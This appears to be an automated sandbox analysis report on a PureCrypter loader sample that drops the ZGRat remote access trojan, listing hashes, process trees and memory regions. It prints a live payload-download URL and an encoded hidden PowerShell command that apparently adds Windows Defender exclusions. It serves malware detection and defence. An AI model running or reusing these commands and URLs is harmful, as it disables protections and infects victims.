purecrypter | 9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2

Analysis

max time kernel
139s
max time network
123s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
21-03-2024 05:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be5041fb817fe1edf7e6c487db9b5534.exe
Size

16KB
MD5

be5041fb817fe1edf7e6c487db9b5534
SHA1

38040d570af54917957504bd88ab7c555e0ee3ba
SHA256

9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2
SHA512

8a0200768436ec3e06b11b2447136720af887398d37bc3e635dd417b5dfd86734f8ebc425ed1e8eb2b2689838f3acda0f9a3f6192a54460b4da1027112d28e62
SSDEEP

384:XZ5sjmrXdBJsVbWcoWj7/D1IDBRJJSrxGw6lx87Pr:p5sjmtsV7PI1PmkEr

Score

10^/10

purecrypter zgrat downloader loader rat

Malware Config

Extracted

Family

purecrypter

http://41.216.183.153/no/dontlook/re/research/Kofdzsxxr.mp3

Signatures

Detect ZGRat V1 35 IoCs

resource	yara_rule
behavioral1/memory/2876-3-0x000000001C1C0000-0x000000001C46A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-5-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-7-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-4-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-9-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-11-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-13-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-15-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-17-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-21-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-19-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-25-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-23-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-27-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-29-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-31-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-35-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-37-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-33-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-39-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-41-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-43-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-45-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-47-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-49-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-51-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-53-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-55-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-57-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-59-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-63-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-61-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-65-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2876-67-0x000000001C1C0000-0x000000001C464000-memory.dmp	family_zgrat_v1
behavioral1/memory/2552-4843-0x000000001ACF0000-0x000000001ADD6000-memory.dmp	family_zgrat_v1

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Executes dropped EXE 2 IoCs

pid	Process
788	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe

Loads dropped DLL 1 IoCs

pid	Process
1748	taskeng.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2876 set thread context of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 788 set thread context of 948	788	NumberDecimalDigits.exe	38

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2876	be5041fb817fe1edf7e6c487db9b5534.exe
2296	powershell.exe
788	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
948	NumberDecimalDigits.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	be5041fb817fe1edf7e6c487db9b5534.exe
Token: SeDebugPrivilege	2876	be5041fb817fe1edf7e6c487db9b5534.exe
Token: SeDebugPrivilege	2552	be5041fb817fe1edf7e6c487db9b5534.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	788	NumberDecimalDigits.exe
Token: SeDebugPrivilege	788	NumberDecimalDigits.exe
Token: SeDebugPrivilege	948	NumberDecimalDigits.exe
Token: SeDebugPrivilege	2304	powershell.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2876 wrote to memory of 2552	2876	be5041fb817fe1edf7e6c487db9b5534.exe	28
PID 2320 wrote to memory of 2296	2320	taskeng.exe	34
PID 2320 wrote to memory of 2296	2320	taskeng.exe	34
PID 2320 wrote to memory of 2296	2320	taskeng.exe	34
PID 1748 wrote to memory of 788	1748	taskeng.exe	37
PID 1748 wrote to memory of 788	1748	taskeng.exe	37
PID 1748 wrote to memory of 788	1748	taskeng.exe	37
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 788 wrote to memory of 948	788	NumberDecimalDigits.exe	38
PID 948 wrote to memory of 716	948	NumberDecimalDigits.exe	40
PID 948 wrote to memory of 716	948	NumberDecimalDigits.exe	40
PID 948 wrote to memory of 716	948	NumberDecimalDigits.exe	40
PID 948 wrote to memory of 2552	948	NumberDecimalDigits.exe	41
PID 948 wrote to memory of 2552	948	NumberDecimalDigits.exe	41
PID 948 wrote to memory of 2552	948	NumberDecimalDigits.exe	41
PID 948 wrote to memory of 1140	948	NumberDecimalDigits.exe	42
PID 948 wrote to memory of 1140	948	NumberDecimalDigits.exe	42
PID 948 wrote to memory of 1140	948	NumberDecimalDigits.exe	42
PID 948 wrote to memory of 1888	948	NumberDecimalDigits.exe	43
PID 948 wrote to memory of 1888	948	NumberDecimalDigits.exe	43
PID 948 wrote to memory of 1888	948	NumberDecimalDigits.exe	43
PID 948 wrote to memory of 2100	948	NumberDecimalDigits.exe	44
PID 948 wrote to memory of 2100	948	NumberDecimalDigits.exe	44
PID 948 wrote to memory of 2100	948	NumberDecimalDigits.exe	44
PID 948 wrote to memory of 2184	948	NumberDecimalDigits.exe	45
PID 948 wrote to memory of 2184	948	NumberDecimalDigits.exe	45
PID 948 wrote to memory of 2184	948	NumberDecimalDigits.exe	45
PID 948 wrote to memory of 2156	948	NumberDecimalDigits.exe	46
PID 948 wrote to memory of 2156	948	NumberDecimalDigits.exe	46
PID 948 wrote to memory of 2156	948	NumberDecimalDigits.exe	46
PID 948 wrote to memory of 1904	948	NumberDecimalDigits.exe	47
PID 948 wrote to memory of 1904	948	NumberDecimalDigits.exe	47
PID 948 wrote to memory of 1904	948	NumberDecimalDigits.exe	47
PID 948 wrote to memory of 308	948	NumberDecimalDigits.exe	48
PID 948 wrote to memory of 308	948	NumberDecimalDigits.exe	48
PID 948 wrote to memory of 308	948	NumberDecimalDigits.exe	48
PID 948 wrote to memory of 984	948	NumberDecimalDigits.exe	49
PID 948 wrote to memory of 984	948	NumberDecimalDigits.exe	49
PID 948 wrote to memory of 984	948	NumberDecimalDigits.exe	49
PID 2320 wrote to memory of 2304	2320	taskeng.exe	50
PID 2320 wrote to memory of 2304	2320	taskeng.exe	50
PID 2320 wrote to memory of 2304	2320	taskeng.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\be5041fb817fe1edf7e6c487db9b5534.exe
"C:\Users\Admin\AppData\Local\Temp\be5041fb817fe1edf7e6c487db9b5534.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Users\Admin\AppData\Local\Temp\be5041fb817fe1edf7e6c487db9b5534.exe
  "C:\Users\Admin\AppData\Local\Temp\be5041fb817fe1edf7e6c487db9b5534.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2552

C:\Windows\system32\taskeng.exe
taskeng.exe {37D60DD0-81E0-4562-B609-E2E00129A6F0} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAATgB1AG0AYgBlAHIARABlAGMAaQBtAGEAbABEAGkAZwBpAHQAcwAuAGUAeABlADsA
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAATgB1AG0AYgBlAHIARABlAGMAaQBtAGEAbABEAGkAZwBpAHQAcwAuAGUAeABlADsA
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2304

C:\Windows\system32\taskeng.exe
taskeng.exe {2D0EBECF-8286-4DE6-91D3-6B9BB832A168} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Users\Admin\AppData\Local\Method\lrbolvcw\NumberDecimalDigits.exe
  C:\Users\Admin\AppData\Local\Method\lrbolvcw\NumberDecimalDigits.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Users\Admin\AppData\Local\Method\lrbolvcw\NumberDecimalDigits.exe
    "C:\Users\Admin\AppData\Local\Method\lrbolvcw\NumberDecimalDigits.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:716
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:2552
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:1140
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:1888
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:2100
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:2184
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:2156
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:1904
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:308
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c4e902115371430772b9e1a667e48d2f

SHA1
4cad43ee6ad451b08e8ac05817a6b02424a1e165

SHA256
62e0e098e9b46b67c90245348344b14a3cd8ab28084b1266cb7f0d236f57922b

SHA512
7c7607ac514a8520d6609f039940159ce80d2d48e5c17471d998bb47bbeb7609b49fd35374a1a6abaa47a2074f4dce15896385fdc2804deb6b4b7ac077c6dc53

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CVR9W7YVFR6WGEPIUJOK.temp

Filesize
7KB

MD5
e520d37eecfb5a8e28610206b939fadf

SHA1
51fdbad2f82a56c53622a4b761297f151a4d6cca

SHA256
0b1c7df6e4d0f8903d982e453dc05eb71804eab7a76b54abc8b0053efffd0fdc

SHA512
2f81ca4ad07c33a27d4fa2536246caf40a1da1741a3f9cce32cf6344ea06e696b2894b68817c0caeba70d068510bb4e9332e2285682c806d9d8346b79c9735dc

Download Submit
\Users\Admin\AppData\Local\Method\lrbolvcw\NumberDecimalDigits.exe

Filesize
16KB

MD5
be5041fb817fe1edf7e6c487db9b5534

SHA1
38040d570af54917957504bd88ab7c555e0ee3ba

SHA256
9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2

SHA512
8a0200768436ec3e06b11b2447136720af887398d37bc3e635dd417b5dfd86734f8ebc425ed1e8eb2b2689838f3acda0f9a3f6192a54460b4da1027112d28e62

Download Submit
memory/788-7088-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

Filesize
9.9MB

Download
memory/788-7089-0x000000001B310000-0x000000001B390000-memory.dmp

Filesize
512KB

Download
memory/788-8910-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

Filesize
9.9MB

Download
memory/788-9469-0x000000001B310000-0x000000001B390000-memory.dmp

Filesize
512KB

Download
memory/788-11916-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/788-11923-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

Filesize
9.9MB

Download
memory/788-7087-0x00000000002D0000-0x00000000002D8000-memory.dmp

Filesize
32KB

Download
memory/948-11924-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

Filesize
9.9MB

Download
memory/948-14150-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

Filesize
9.9MB

Download
memory/948-14149-0x000000001A7E0000-0x000000001A860000-memory.dmp

Filesize
512KB

Download
memory/2296-7078-0x0000000000DF0000-0x0000000000DF8000-memory.dmp

Filesize
32KB

Download
memory/2296-7082-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-7077-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-7080-0x0000000001710000-0x0000000001790000-memory.dmp

Filesize
512KB

Download
memory/2296-7076-0x000000001A2D0000-0x000000001A5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2296-7079-0x0000000001710000-0x0000000001790000-memory.dmp

Filesize
512KB

Download
memory/2296-7081-0x0000000001710000-0x0000000001790000-memory.dmp

Filesize
512KB

Download
memory/2304-14159-0x0000000001200000-0x0000000001208000-memory.dmp

Filesize
32KB

Download
memory/2304-14163-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-14162-0x0000000001780000-0x0000000001800000-memory.dmp

Filesize
512KB

Download
memory/2304-14161-0x0000000001780000-0x0000000001800000-memory.dmp

Filesize
512KB

Download
memory/2304-14156-0x000000001A0D0000-0x000000001A3B2000-memory.dmp

Filesize
2.9MB

Download
memory/2304-14160-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-14157-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-14158-0x0000000001780000-0x0000000001800000-memory.dmp

Filesize
512KB

Download
memory/2552-4840-0x0000000140000000-0x000000014009A000-memory.dmp

Filesize
616KB

Download
memory/2552-7071-0x000007FEF5A40000-0x000007FEF642C000-memory.dmp

Filesize
9.9MB

Download
memory/2552-7069-0x0000000001F10000-0x0000000001F64000-memory.dmp

Filesize
336KB

Download
memory/2552-7068-0x0000000001DE0000-0x0000000001E36000-memory.dmp

Filesize
344KB

Download
memory/2552-4842-0x000000001AE80000-0x000000001AF00000-memory.dmp

Filesize
512KB

Download
memory/2552-4843-0x000000001ACF0000-0x000000001ADD6000-memory.dmp

Filesize
920KB

Download
memory/2552-4841-0x000007FEF5A40000-0x000007FEF642C000-memory.dmp

Filesize
9.9MB

Download
memory/2876-35-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-41-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-2005-0x000007FEF5A40000-0x000007FEF642C000-memory.dmp

Filesize
9.9MB

Download
memory/2876-2658-0x000000001B090000-0x000000001B110000-memory.dmp

Filesize
512KB

Download
memory/2876-4830-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/2876-4831-0x000000001BEF0000-0x000000001BFDC000-memory.dmp

Filesize
944KB

Download
memory/2876-4832-0x0000000000740000-0x000000000078C000-memory.dmp

Filesize
304KB

Download
memory/2876-4833-0x0000000000950000-0x00000000009A4000-memory.dmp

Filesize
336KB

Download
memory/2876-4839-0x000007FEF5A40000-0x000007FEF642C000-memory.dmp

Filesize
9.9MB

Download
memory/2876-65-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-61-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-63-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-59-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-57-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-55-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-53-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-51-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-49-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-47-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-45-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-43-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-67-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-39-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-33-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-37-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-0-0x00000000009D0000-0x00000000009D8000-memory.dmp

Filesize
32KB

Download
memory/2876-31-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-29-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-27-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-23-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-25-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-19-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-21-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-17-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-15-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-13-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-11-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-9-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-4-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-7-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-5-0x000000001C1C0000-0x000000001C464000-memory.dmp

Filesize
2.6MB

Download
memory/2876-3-0x000000001C1C0000-0x000000001C46A000-memory.dmp

Filesize
2.7MB

Download
memory/2876-2-0x000000001B090000-0x000000001B110000-memory.dmp

Filesize
512KB

Download
memory/2876-1-0x000007FEF5A40000-0x000007FEF642C000-memory.dmp

Filesize
9.9MB

Download